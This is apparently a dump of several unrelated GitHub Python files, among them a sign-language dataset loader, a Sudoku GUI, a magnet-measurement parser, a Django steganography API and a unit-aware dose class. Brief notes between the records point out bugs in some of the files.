\"gloss_seq\": info[\"label_gloss\"],\n \"sentence\": \"\".join(info[\"label_char\"]),\n \"split\": \"train\",\n }\n\n with open(\"data/CSL-Daily/sentence_label/split_1.txt\") as f:\n _ = f.readline()\n while True:\n line = f.readline()\n if not line:\n break\n name, split = line.strip().split(\"|\")\n if name in samples:\n samples[name][\"split\"] = split\n\n self.train_samples = [\n sample for sample in samples.values() if sample[\"split\"] == \"train\"\n ]\n self.val_samples = [\n sample for sample in samples.values() if sample[\"split\"] == \"dev\"\n ]\n self.test_samples = [\n sample for sample in samples.values() if sample[\"split\"] == \"dev\"\n ]\n\n self.train_dataset = CSLDailyImpl(self.train_samples, gloss_vocabs)\n self.val_dataset = CSLDailyImpl(self.val_samples, gloss_vocabs)\n self.test_dataset = CSLDailyImpl(self.test_samples, gloss_vocabs)\n\n def train_dataloader(self):\n return DataLoader(\n self.train_dataset,\n batch_size=self.train_batch_size,\n shuffle=True,\n num_workers=self.num_workers,\n pin_memory=True,\n )\n\n def val_dataloader(self):\n return DataLoader(\n self.val_dataset,\n batch_size=self.val_batch_size,\n shuffle=False,\n num_workers=self.num_workers,\n pin_memory=True,\n )\n\n def test_dataloader(self):\n return DataLoader(\n 
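Note: in CSLDailyImpl.__getitem__ above, 101 and 102 are BERT's [CLS] and [SEP] token ids and 0 is [PAD] in the bert-base-chinese vocabulary. The original pads gloss_ids up to length 64 but never truncates, so an over-long gloss sequence would break fixed-size batching; a sketch that adds the missing truncation:

    def encode_glosses(gloss_seq, vocab, max_len=64):
        ids = [101] + [vocab[g] for g in gloss_seq] + [102]  # [CLS] ... [SEP]
        ids = ids[:max_len]                        # truncation (absent in the original)
        return ids + [0] * (max_len - len(ids))    # [PAD] to fixed length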
self.test_dataset,\n batch_size=self.test_batch_size,\n shuffle=False,\n num_workers=self.num_workers,\n pin_memory=True,\n )\n","repo_name":"Cherrling/Gesture_Vision","sub_path":"generate/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"18585765432","text":"#!/usr/bin/env python\nimport os\nfrom glob import glob\nimport argparse\n\nEXT = ['*_CODE.bin','*_DATA.bin','*_BSS.bin','*_UNASSIGNED.bin','*.lis','*.map','*.def','*.err,','*.ticks_history.txt','*.sym']\nEXT_ALL = ['zf_lib.lib','*.bin','*.ram','*.rom','*.com','*.COM','*.o']\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--all\", action='store_true', help=\"Remove all intermediate files\")\n args = parser.parse_args()\n\n for e in EXT + EXT_ALL if args.all else EXT:\n for f in glob(os.path.join(os.getcwd(), f\"**/{e}\"), recursive=True):\n os.remove(f)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tangent3D/Z-FIGHTER","sub_path":"software/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"33421763805","text":"from PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import QMainWindow, QCheckBox, QTextEdit, QPushButton\n\n\nclass SudokuGUI(QMainWindow):\n \"\"\"The class used to create the Sudoku GUI.\n\n This class is responsible for the GUI elements of the program.\n It is not responsible for functionality of the program, for example it\n creates the buttons but does not decide what the buttons do.\n\n Attributes:\n cells: Each Sudoku cell/node as a QPushButton.\n king_check: QCheckBox for king constraint to be enabled.\n knight_check: QCheckBox for knight constraint to be enabled.\n check_text: QTextEdit used to display information to the user.\n generate_btn: QPushButton used to pseudo generate a unsolved Sudoku board.\n undo_btn: QPushButton used to undo the latest actions performed by the user.\n clear_btn: QPushButton used to clear the entire board.\n solve_btn: QPushButton used to solve the board.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(SudokuGUI, self).__init__(*args, **kwargs)\n\n self.move(700, 250)\n self.setFixedHeight(462)\n self.setFixedWidth(620)\n self.setStyleSheet(\"background-color: black;\")\n self.setWindowTitle(\"Sudoku\")\n\n self.cells = []\n\n self.check_text = QTextEdit(self)\n self.check_text.setReadOnly(True)\n self.check_text.move(465, 255)\n self.check_text.resize(150, 150)\n self.check_text.setStyleSheet(\"background-color: lightblue;\")\n self.check_text.setText(\"\")\n\n self.knight_check = QCheckBox(self)\n self.knight_check.resize(75, 25)\n self.knight_check.move(465, 5)\n self.knight_check.setText(\"Knight\")\n self.knight_check.setChecked(False)\n self.knight_check.setStyleSheet(\"background-color: #33afff;\")\n\n self.king_check = QCheckBox(self)\n self.king_check.resize(75, 25)\n self.king_check.move(540, 5)\n self.king_check.setText(\"King\")\n self.king_check.setChecked(False)\n self.king_check.setStyleSheet(\"background-color: #33afff;\")\n\n self.generate_btn = self._create_button(465, 35, \"Generate\")\n self.undo_btn = self._create_button(465, 90, \"Undo\")\n self.clear_btn = self._create_button(465, 145, \"Clear\")\n self.check_btn = self._create_button(465, 200, \"Check\")\n self.solve_btn = self._create_button(465, 410, \"Solve\")\n\n self._create_board()\n\n def 
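Note: in clean.py the EXT entry '*.err,' carries a stray trailing comma inside the pattern string, so .err files are never matched. An equivalent recursive cleanup sketch with pathlib (pattern list abbreviated):

    from pathlib import Path

    for pattern in ["*.lis", "*.map", "*.err"]:   # "*.err", not "*.err,"
        for f in Path.cwd().rglob(pattern):
            f.unlink()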
_create_board(self):\n \"\"\"Arithmetically creates a Sudoku board of QPushButtons.\"\"\"\n size = 50\n margin = 1\n\n for row in range(9):\n cell_row = []\n for column in range(9):\n cell = QPushButton(\"\", self)\n\n tmp_x = 0\n tmp_y = 0\n\n if column >= 3:\n tmp_x += 2\n\n if column >= 6:\n tmp_x += 2\n\n if row >= 3:\n tmp_y += 2\n\n if row >= 6:\n tmp_y += 2\n\n cell.setFont(QFont(\"Callibri\", 28))\n cell.resize(size, size)\n cell.move((size + margin) * column + tmp_x, (size + margin) * row + tmp_y)\n cell.setStyleSheet(\"background-color: white; border: 1px solid black;\")\n cell_row.append(cell)\n\n self.cells.append(cell_row)\n\n def _create_button(self, x, y, text):\n \"\"\"Create a button with the same style.\n\n Args:\n x: The x-position of the button.\n y: The y-position of the button.\n text: The text on the button.\n\n Returns:\n The button as a QPushButton element.\n \"\"\"\n button = QPushButton(self)\n button.setText(text)\n button.move(x, y)\n button.resize(150, 50)\n button.setStyleSheet(\"background-color: #33afff;\")\n\n return button\n","repo_name":"JonOlav95/algorithm_x","sub_path":"interface/gui_parent.py","file_name":"gui_parent.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27427195472","text":"'''\nScript for load data files for machine learn main software\nversion: v1.0 \n'''\nimport sys\nimport numpy as np\nimport pandas as pd\nimport os\nimport random as random\nimport time\nimport datetime\nimport matplotlib.pyplot as plt\nfrom PyQt5 import QtWidgets, QtCore\n\n\nclass DataFileError(Exception):\n \"\"\"Data file error\"\"\"\n\n def __init__(self, message, *args):\n \"\"\"Initialize variables\"\"\"\n self.message = message\n\nclass Main_Script(object):\n \"\"\"Rotating coil file data\"\"\"\n def __init__(self):\n self.file = np.array([])\n \n \n def load_files(self):\n \"\"\"Load input database\"\"\"\n try:\n app=QtWidgets.QApplication.instance()\n if not app:\n app = QtWidgets.QApplication(sys.argv)\n file_path = QtWidgets.QFileDialog.getOpenFileNames()\n self.files = self.sort_list(file_path[0])\n #self.DataFile()\n return True\n except:\n return False\n \n def sort_list(self,list):\n \"\"\"Sort data by input date, avoiding wrong information\"\"\"\n index = np.array([])\n for i in range(len(list)):\n index = np.append(index, time.mktime(datetime.datetime.strptime(list[i][list[i].find('.dat')-13:list[i].find('.dat')], '%y%m%d_%H%M%S').timetuple()))\n index = index.argsort()\n\n _file_List = np.array([])\n for i in range(len(list)):\n _file_List = np.append(_file_List,list[index[i]])\n\n return _file_List\n \n def _search_in_file_lines(self, lines, search_str, alt_search_str=None):\n \"\"\"Search individual infos from each data\"\"\"\n found_in_file = np.where(np.char.find(lines, search_str) > -1)\n if len(found_in_file) == 0 and alt_search_str is not None:\n found_in_file = np.where(\n np.char.find(lines, alt_search_str) > -1)[0]\n if len(found_in_file) != 0:\n index = found_in_file[0][0]\n else:\n index = None\n return index\n \n def DataFile(self):\n \"\"\" Rotating coil file data\"\"\"\n self.Data = np.array([])\n n = len(self.files)\n for i in range (n):\n self.Data = np.append(self.Data, Main_Script())\n self.Data[i].file = self.files[i]\n arq = open(self.Data[i].file)\n self.Data[i].Raw = np.array(arq.read().splitlines())\n \n #Parse filename\n filename_split = (os.path.split(self.Data[i].file)[1].split('.')[0].split('_'))\n \n #Read Magnet 
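Note: _search_in_file_lines above has a latent bug: np.where(cond) returns a 1-tuple of index arrays, so len(found_in_file) == 0 is never true, the alt_search_str fallback never runs, and found_in_file[0][0] raises IndexError when nothing matches. A corrected standalone sketch:

    import numpy as np

    def search_in_lines(lines, search_str, alt_search_str=None):
        # Index [0] unpacks the tuple; test the array's size, not the tuple's len.
        hits = np.where(np.char.find(lines, search_str) > -1)[0]
        if hits.size == 0 and alt_search_str is not None:
            hits = np.where(np.char.find(lines, alt_search_str) > -1)[0]
        return int(hits[0]) if hits.size else None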
Name\n index = self._search_in_file_lines(self.Data[i].Raw, 'file', 'arquivo')\n if index is not None:\n self.Data[i].magnet_name = (\n self.Data[i].Raw[index].split('\\t')[1].split('\\\\')[-1].split('_')[0])\n else:\n self.Data[i].magnet_name = filename_split[0]\n \n #Read Date\n index = self._search_in_file_lines(self.Data[i].Raw, 'date', 'data')\n if index is not None:\n self.Data[i].date = (\n self.Data[i].Raw[index].split('\\t')[1].split('\\\\')[-1].split('_')[0]) \n else:\n if len(filename_split) > 1:\n self.Data[i].date = filename_split[-2]\n \n #Read Hour\n index = self._search_in_file_lines(self.Data[i].Raw, 'hour', 'hora')\n if index is not None:\n self.Data[i].hour = (\n self.Data[i].Raw[index].split('\\t')[1].split('\\\\')[-1].split('_')[0])\n else:\n if len(filename_split) > 2:\n self.Data[i].hour = filename_split[-1]\n \n #Read Measure Number\n index = self._search_in_file_lines(self.Data[i].Raw, 'analysis_interval', 'intervalo_analise')\n if index is not None:\n self.Data[i].measure_number = (\n self.Data[i].Raw[index].split('\\t')[1].split('-'))\n \n #Read Number of Measures Used to Calculate the Mean Value\n index = self._search_in_file_lines(self.Data[i].Raw, 'n_turns', 'nr_voltas')\n if index is not None:\n self.Data[i].measure_number_mean = self.Data[i].Raw[index].split('\\t')[1]\n \n #Read Temperature\n index = self._search_in_file_lines(self.Data[i].Raw, 'temperature', 'temperatura_ima')\n if index is not None:\n self.Data[i].temperature = self.Data[i].Raw[index].split('\\t')[1]\n \n #Read encoder start pulse\n index = self._search_in_file_lines(self.Data[i].Raw, 'pulse_start_collect', 'pulso_start_coleta')\n if index is not None:\n self.Data[i].start_pulse = self.Data[i].Raw[index].split('\\t')[1]\n \n #### Take Currents ####\n \n # Read main current\n index = self._search_in_file_lines(self.Data[i].Raw, 'main_coil_current_avg', 'corrente_alim_principal_avg')\n if index is not None:\n self.Data[i].main_current = float(self.Data[i].Raw[index].split('\\t')[1])\n \n index = self._search_in_file_lines(self.Data[i].Raw, 'main_coil_current_std', 'corrente_alim_principal_std')\n if index is not None:\n self.Data[i].main_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n\n # Read Trim Current\n index = self._search_in_file_lines(self.Data[i].Raw, 'trim_coil_current_avg', 'corrente_alim_secundaria_avg')\n if index is not None:\n self.Data[i].trim_current = float(self.Data[i].Raw[index].split('\\t')[1])\n\n index = self._search_in_file_lines(self.Data[i].Raw, 'trim_coil_current_std', 'corrente_alim_secundaria_std')\n if index is not None:\n self.Data[i].trim_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n\n # Read CH Current\n index = self._search_in_file_lines(self.Data[i].Raw, 'ch_coil_current_avg')\n if index is not None:\n self.Data[i].ch_current = float(self.Data[i].Raw[index].split('\\t')[1])\n\n index = self._search_in_file_lines(self.Data[i].Raw, 'ch_coil_current_std')\n if index is not None:\n self.Data[i].ch_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n\n # Read CV Current\n index = self._search_in_file_lines(self.Data[i].Raw, 'cv_coil_current_avg')\n if index is not None:\n self.Data[i].cv_current = float(self.Data[i].Raw[index].split('\\t')[1])\n\n index = self._search_in_file_lines(self.Data[i].Raw, 'cv_coil_current_std')\n if index is not None:\n self.Data[i].cv_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n\n # Read QS Current\n index = self._search_in_file_lines(self.Data[i].Raw, 
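Note: DataFile() repeats the same "find line, split on tab, take column 1, cast" block for every field; a hypothetical helper (not in the original) that collapses the pattern:

    def read_field(lines, index, cast=str):
        # None-safe extraction of the value column from a "name\tvalue" line.
        if index is None:
            return None
        return cast(lines[index].split('\t')[1])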
'qs_coil_current_avg')\n if index is not None:\n self.Data[i].qs_current = float(self.Data[i].Raw[index].split('\\t')[1])\n\n index = self._search_in_file_lines(self.Data[i].Raw, 'qs_coil_current_std')\n if index is not None:\n self.Data[i].qs_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n \n #print(self.Data[i].main_current)\n \n self._get_multipoles_from_file_data()\n \n def _get_multipoles_from_file_data(self):\n n = len(self.files)\n i=0\n for i in range (n):\n index = self._search_in_file_lines(\n self.Data[i].Raw, 'Reading Data', 'Dados de Leitura')\n if index is not None:\n index_multipoles = index + 3\n multipoles_str = self.Data[i].Raw[index_multipoles:index_multipoles+15]\n multipoles = np.array([])\n for value in multipoles_str:\n multipoles = np.append(multipoles, value.split('\\t'))\n self.Data[i].multipoles = multipoles.reshape(15, 13).astype(np.float64)\n self.Data[i].magnet_type = np.nonzero(self.Data[i].multipoles[:, 7])[0][0]\n self.Data[i].columns_names = np.array(self.Data[i].Raw[index + 2].split('\\t'))\n self.Data[i].reference_radius = float(\n self.Data[i].Raw[index + 2].split(\"@\")[1].split(\"mm\")[0])/1000\n else:\n message = (\n 'Failed to read multipoles from file: \\n\\n\"%s\"' %\n self.Data[i].file)\n raise DataFileError(message)\n \n ### Getting Raw data ###\n index = self._search_in_file_lines(self.Data[i].Raw, 'Raw Data Stored', 'Dados Brutos')\n if index is not None:\n curves_str = self.Data[i].Raw[index+3:]\n curves = np.array([])\n for value in curves_str:\n curves = np.append(curves, value[:-1].split('\\t'))\n self.Data[i].curves = curves.reshape(\n int(len(curves_str)),\n int(len(curves)/len(curves_str))).astype(np.float64)*1e-12\n else:\n message = (\n 'Failed to read raw data from file: \\n\\n\"%s\"' % self.Data[i].file)\n raise DataFileError(message)\n \n self._create_data_frames()\n \n def _create_data_frames(self):\n n = len(self.files)\n i=0\n for i in range (n):\n if (self.Data[i].multipoles is None or self.Data[i].curves is None or\n self.Data[i].columns_names is None):\n return\n\n index = np.char.mod('%d', np.linspace(1, 15, 15))\n self.Data[i].multipoles_df = pd.DataFrame(\n self.Data[i].multipoles, columns=self.Data[i].columns_names, index=index)\n\n _npoints = self.Data[i].curves.shape[0]\n _ncurves = self.Data[i].curves.shape[1]\n index = np.char.mod('%d', np.linspace(1, _npoints, _npoints))\n columns = np.char.mod('%d', np.linspace(1, _ncurves, _ncurves))\n self.Data[i].curves_df = pd.DataFrame(\n self.Data[i].curves, index=index, columns=columns)\n \n def _calc_offsets(self):\n n = len(self.files)\n i=0\n for i in range (n):\n if self.Data[i].multipoles is None or self.Data[i].magnet_type is None:\n return\n if self.Data[i].magnet_type != 0:\n n = self.Data[i].magnet_type\n normal = self.Data[i].multipoles[:, 1]\n normal_err = self.Data[i].multipoles[:, 2]\n skew = self.Data[i].multipoles[:, 3]\n skew_err = self.Data[i].multipoles[:, 4]\n\n self.Data[i].offset_x = normal[n-1]/(n*normal[n])\n self.Data[i].offset_x_err = (\n ((normal_err[n-1]/(n*normal[n]))**2 -\n (normal[n-1]*normal_err[n]/(n*(normal[n]**2)))**2)**(1/2))\n\n self.Data[i].offset_y = skew[n-1]/(n*normal[n])\n self.Data[i].offset_y_err = (\n ((skew_err[n-1]/(n*normal[n]))**2 -\n (skew[n-1]*normal_err[n]/(n*(normal[n]**2)))**2)**(1/2))\n else:\n self.Data[i].offset_x = 0\n self.Data[i].offset_x_err = 0\n self.Data[i].offset_y = 0\n self.Data[i].offset_y_err = 0\n \n def _set_roll(self):\n n = len(self.files)\n i=0\n for i in range (n):\n if 
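Note: the multipole block above is parsed by flattening every tab-separated row and reshaping; the same idiom in miniature (toy rows; -1 lets numpy infer the column count):

    import numpy as np

    rows = ["1\t2\t3", "4\t5\t6"]
    flat = np.concatenate([r.split('\t') for r in rows])
    table = flat.reshape(len(rows), -1).astype(np.float64)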
self.Data[i].multipoles is None or self.Data[i].magnet_type is None:\n return\n self.Data[i].roll = self.Data[i].multipoles[self.Data[i].magnet_type, 7]\n self.Data[i].roll_err = self.Data[i].multipoles[self.Data[i].magnet_type, 8]\n \n def calc_residual_field(self, pos):\n \"\"\"Calculate residual field.\n\n Args:\n pos (array): transversal position values [m].\n\n Returns:\n residual_normal (array): normal residual field [T].\n residual_skew (array): skew residual field [T].\n \"\"\"\n n = len(self.files)\n i=0\n for i in range (n):\n if self.Data[i].multipoles is None or self.Data[i].magnet_type is None:\n return None, None\n\n n = self.Data[i].magnet_type\n nr_harmonics = self.Data[i].multipoles.shape[0]\n\n nrpts = len(pos)\n residual_normal = np.zeros(nrpts)\n residual_skew = np.zeros(nrpts)\n\n normal = self.Data[i].multipoles[:, 1]\n skew = self.Data[i].multipoles[:, 3]\n\n for i in range(nrpts):\n for m in range(n+1, nr_harmonics):\n residual_normal[i] += (normal[m]/normal[n])*(pos[i]**(m - n))\n residual_skew[i] += (skew[m]/normal[n])*(pos[i]**(m - n))\n\n return residual_normal, residual_skew\n \n def calc_residual_multipoles(self, pos):\n \"\"\"Calculate residual field multipoles.\n\n Args:\n pos (array): transversal position values [m].\n\n Returns:\n residual_mult_normal (array): normal residual multipoles table.\n residual_mult_skew (array): skew residual multipoles table.\n \"\"\"\n n = len(self.files)\n i=0\n for i in range (n):\n if self.Data[i].multipoles is None or self.Data[i].magnet_type is None:\n return None, None\n\n n = self.Data[i].magnet_type\n nr_harmonics = self.Data[i].multipoles.shape[0]\n\n nrpts = len(pos)\n residual_mult_normal = np.zeros([nr_harmonics, nrpts])\n residual_mult_skew = np.zeros([nr_harmonics, nrpts])\n\n normal = self.Data[i].multipoles[:, 1]\n skew = self.Data[i].multipoles[:, 3]\n\n for i in range(nrpts):\n for m in range(n+1, nr_harmonics):\n residual_mult_normal[m, i] = (\n normal[m]/normal[n])*(pos[i]**(m - n))\n residual_mult_skew[m, i] = (\n skew[m]/normal[n])*(pos[i]**(m - n))\n\n return residual_mult_normal, residual_mult_skew","repo_name":"LucasIB/Machine-Learning-for-Rotating-Coil-Magnetic-Measurements","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":14281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10169118668","text":"import mimetypes\nimport os\nfrom urllib.parse import unquote\nfrom wsgiref.util import FileWrapper\n\nfrom django.conf import settings\nfrom django.http import FileResponse, HttpResponse\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.mixins import (CreateModelMixin, ListModelMixin,\n RetrieveModelMixin)\nfrom rest_framework.parsers import MultiPartParser\nfrom rest_framework.response import Response\n\nfrom .core import Steganography\nfrom .models import Image, ImageHidden\nfrom .serializers import (ImageHiddenListSerializer, ImageHiddenSerializer,\n ImageListSerializer, ImageSerializer,\n RequestImageHiddenSerializer)\n\nsteganography = Steganography()\n\n\nclass ImageViewSet(\n ListModelMixin,\n CreateModelMixin,\n RetrieveModelMixin,\n viewsets.GenericViewSet,\n):\n queryset = Image.objects.all()\n serializer_class = ImageSerializer\n parser_classes = (MultiPartParser,)\n\n def get_serializer(self, *args, **kwargs):\n if self.action == \"create\":\n return ImageSerializer(*args, **kwargs)\n return 
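Note: in calc_residual_field and calc_residual_multipoles above, i is reused for both the outer file loop and the inner position index, n for both the file count and the magnet type, and the return sits inside the file loop, so only the first file is ever processed. A single-dataset sketch of the intended sum, residual(x) = sum over m > n of (B_m / B_n) * x**(m - n):

    import numpy as np

    def residual_field(normal, skew, n, pos):
        # normal/skew: multipole columns; n: index of the main harmonic.
        res_normal = np.zeros(len(pos))
        res_skew = np.zeros(len(pos))
        for k, x in enumerate(pos):
            for m in range(n + 1, len(normal)):
                res_normal[k] += (normal[m] / normal[n]) * x ** (m - n)
                res_skew[k] += (skew[m] / normal[n]) * x ** (m - n)
        return res_normal, res_skew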
ImageListSerializer(\n *args, **kwargs, context={\"request\": self.request}\n )\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n response_data = serializer.save()\n headers = self.get_success_headers(serializer.data)\n response = {\n \"id\": response_data.id,\n \"url\": f\"/image/{response_data.id}\",\n \"message\": \"Image uploaded successfully\",\n }\n return Response(\n response, status=status.HTTP_201_CREATED, headers=headers\n )\n\n def retrieve(self, request, *args, **kwargs):\n queryset = Image.objects.get(id=kwargs[\"pk\"])\n file_handle = queryset.image.path\n with open(file_handle, \"rb\") as file:\n response = HttpResponse(\n FileWrapper(file), content_type=\"image/bmp\"\n )\n response[\"Content-Disposition\"] = (\n \"attachment; filename=original_\" + queryset.image.name\n )\n return response\n\n\nclass EncodeViewSet(CreateModelMixin, viewsets.GenericViewSet):\n queryset = ImageHidden.objects.all()\n serializer_class = RequestImageHiddenSerializer\n\n def create(self, request, *args, **kwargs):\n pk_original_image = request.data[\"image\"]\n message = request.data[\"message\"]\n image_original = Image.objects.get(id=pk_original_image)\n url_image = image_original.image.path\n encoded_image = steganography.encode(url_image, message)\n data = {\n \"image\": image_original.id,\n \"image_hidden\": encoded_image,\n }\n serializer = ImageHiddenSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n response_data = serializer.save()\n headers = self.get_success_headers(serializer.data)\n response = {\n \"id\": response_data.id,\n \"message\": \"Image encoded successfully\",\n }\n\n return Response(\n response,\n status=status.HTTP_201_CREATED,\n headers=headers,\n )\n\n\nclass DecodeViewSet(\n ListModelMixin, RetrieveModelMixin, viewsets.GenericViewSet\n):\n queryset = ImageHidden.objects.all()\n serializer_class = ImageHiddenSerializer\n\n def get_serializer(self, *args, **kwargs):\n if self.action == \"list\":\n return ImageHiddenListSerializer(\n *args, **kwargs, context={\"request\": self.request}\n )\n return ImageHiddenSerializer(*args, **kwargs)\n\n def retrieve(self, request, *args, **kwargs):\n obj = self.get_object()\n url_image = obj.image_hidden\n message_decoded = steganography.decode(url_image)\n base_url = request.build_absolute_uri().replace(\n request.get_full_path(), '/'\n )\n image_original = request.build_absolute_uri(obj.image.image.url)\n data = {\n \"id\": obj.id,\n \"image_original\": image_original,\n \"image_hidden\": base_url + str(obj.image_hidden),\n 'message': message_decoded,\n }\n return Response(\n data, status=status.HTTP_200_OK\n )\n\n\n@api_view([\"GET\"])\n@permission_classes([])\ndef get_media_path(request, path):\n if not os.path.exists(f\"{settings.MEDIA_ROOT}/{path}\"):\n return Response(\"No such file exists.\", status=404)\n\n mimetype, encoding = mimetypes.guess_type(path, strict=True)\n if not mimetype:\n mimetype = \"text/html\"\n file_path = unquote(os.path.join(settings.MEDIA_ROOT, path)).encode(\n \"utf-8\"\n )\n return FileResponse(open(file_path, \"rb\"), content_type=mimetype)\n","repo_name":"wendryosales/steganography","sub_path":"backend/steganography/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41779332878","text":"# Write a function that given a string of characters, returns the longest 
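Note: get_media_path above joins a URL-supplied path straight into MEDIA_ROOT, so a crafted "../" path can escape the media directory (path traversal). A hedged hardening sketch (hypothetical helper):

    import os

    def is_safe_media_path(media_root, user_path):
        root = os.path.realpath(media_root)
        full = os.path.realpath(os.path.join(root, user_path))
        # Reject anything that resolves outside MEDIA_ROOT.
        return os.path.commonpath([full, root]) == root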
word in the sentence.\n\n\ndef longest_Word(sentence):\n longestWord = \"\"\n if \" \" not in sentence:\n return sentence\n else:\n split = sentence.split(\" \")\n print(split)\n for word in split:\n if(len(word) > len(longestWord)):\n longestWord = word\n return longestWord\n\n\nprint(longest_Word(\"Not so long sentence.\"))\n","repo_name":"ChildishhAlbino/Daily-Coding-Problems-Solutions","sub_path":"Misc/Longest Word.py","file_name":"Longest Word.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18470848717","text":"#!/bin/env python3\n\nimport logging\nfrom typing import Any\n\nimport pint\n\nlog = logging.getLogger(__name__)\n\n\nureg = pint.UnitRegistry(\n preprocessors=[\n lambda s: s.replace(\"%\", \"percent\"),\n lambda s: s.replace(\"%%\", \"permille\"),\n ]\n)\n\nureg.define(\"micro- = 10**-6 = mc- = μ-\")\nureg.define(\"percent = 0.01 = %\")\nureg.define(\"permille = 0.001 = %%\")\n\n\nureg.define(\"cup = 2*dl\")\n\n# NOTE: Not sure if this is correct? But gets rid of the warnings...\nureg.define(\"x = count\")\nureg.define(\"IU = x\") # for now\nureg.define(\"CFU = x\") # for now\nureg.define(\"unknown = x\") # for now\nureg.define(\"serving = x\") # for now\nureg.define(\"puff = x\") # for now\nureg.define(\"puffs = x\") # for now\n\nureg.define(\"B = 10**9 * x\") # for noting billions of CFU, for example\n\n# The type here is because mypy doesn't like this dynamically created type\nQ_: Any = ureg.Quantity\n\n\nclass Dose:\n def __init__(self, substance: str, amount: str | Q_) -> None:\n self.substance: str = substance\n if not isinstance(amount, ureg.Quantity):\n self.quantity = Q_(amount)\n else:\n self.quantity = amount\n\n def __str__(self) -> str:\n return f\"{self.amount_with_unit} {self.substance}\"\n\n @property\n def amount(self) -> float:\n # return the amount as a float, in the base unit (kg for mass, L for volumes)\n return self.quantity.to_base_units().magnitude\n\n @property\n def amount_with_unit(self) -> str:\n if not self.quantity.units:\n return str(round(self.quantity))\n q = self.quantity.to_compact()\n # print(q)\n amount = q.magnitude\n amount = round(amount) if round(amount, 8) % 1.0 == 0 else amount\n return f\"{amount}{q.units:~P}\"\n\n def __repr__(self):\n return f\"\"\n\n def __add__(self, other: \"Dose\") -> \"Dose\":\n if self.quantity.units.dimensionality != other.quantity.units.dimensionality:\n # if quantity of either is 0, we skip it\n if self.quantity.magnitude == 0:\n return other\n if other.quantity.magnitude == 0:\n return self\n raise ValueError(\n f\"Cannot add doses with different units: {self.quantity.units} and {other.quantity.units} (for {self} and {other})\"\n )\n assert self.substance.lower() == other.substance.lower()\n return Dose(self.substance, self.quantity + other.quantity)\n\n def __truediv__(self, b):\n return Dose(self.substance, self.quantity / b)\n\n def __lt__(self, other):\n return self.quantity < other.quantity\n\n def __eq__(self, other):\n return (\n self.substance == other.substance\n and round((self.quantity - other.quantity).magnitude, 12) == 0\n )\n\n\ndef test_amount_with_unit():\n d = Dose(\"L\", \"100 mcg\")\n assert d.amount_with_unit == \"100mcg\"\n\n\ndef test_amount_unitless():\n d = Dose(\"Candy\", \"10x\")\n assert d.amount_with_unit == \"10x\"\n\n\ndef test_amount_iu():\n d = Dose(\"Vitamin D\", \"5000 IU\")\n assert d.amount_with_unit == \"5kIU\"\n\n\ndef test_amount_cfu():\n d = Dose(\"CFU\", 
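Note: a minimal usage sketch of the Dose class above (values illustrative), exercising the unit-aware addition and compact formatting it implements:

    a = Dose("caffeine", "100 mg")
    b = Dose("caffeine", "0.1 g")
    print(a + b)   # expected: 200mg caffeine; incompatible units raise ValueError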
\"7B\")\n assert d.amount_with_unit == \"7B\"\n","repo_name":"ErikBjare/QSlang","sub_path":"qslang/dose.py","file_name":"dose.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"13115526692","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\nn, m = map(int, input().split())\ngraph, visited = [], []\ntime, now, cnt = 0, 2, [] # 총 시간, 현재 치즈 녹는 거 표시, 개수\n\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\n\nfor _ in range(n):\n graph.append(list(map(int, input().split())))\n visited.append([0] * m)\n\ndef bfs(x, y, v):\n cnt = 0\n q = deque()\n q.append((x, y))\n while q:\n x, y = q.popleft()\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n if 0 <= nx < m and 0 <= ny < n:\n if graph[ny][nx] == -1 and visited[ny][nx] != v:\n if graph[y][x] != -1:\n cnt += 1\n graph[y][x] = -1\n if graph[ny][nx] == 1 and visited[ny][nx] != v:\n visited[ny][nx] = v\n q.append((nx, ny))\n return cnt\n\n# 바깥부분 = -1\ndef hole(x, y, v): \n flag = False\n q = deque()\n q.append((x, y))\n while q:\n x, y = q.popleft()\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n if 0 <= nx < m and 0 <= ny < n:\n if graph[ny][nx] == -1:\n flag = True\n if graph[ny][nx] == 0 and visited[ny][nx] != v:\n visited[ny][nx] = v\n if v == -1:\n graph[ny][nx] = -1\n q.append((nx, ny))\n return flag\n\nhole(0, 0, -1)\nwhile True:\n flag = 0\n cnt.append(0)\n\n for i in range(n):\n for j in range(m):\n if graph[i][j] == 0:\n if hole(j, i, now):\n hole(j, i, -1)\n \n for i in range(n):\n for j in range(m):\n if graph[i][j] == 1:\n flag = 1\n cnt[-1] += bfs(j, i, now)\n if not flag: break \n now += 1\n time += 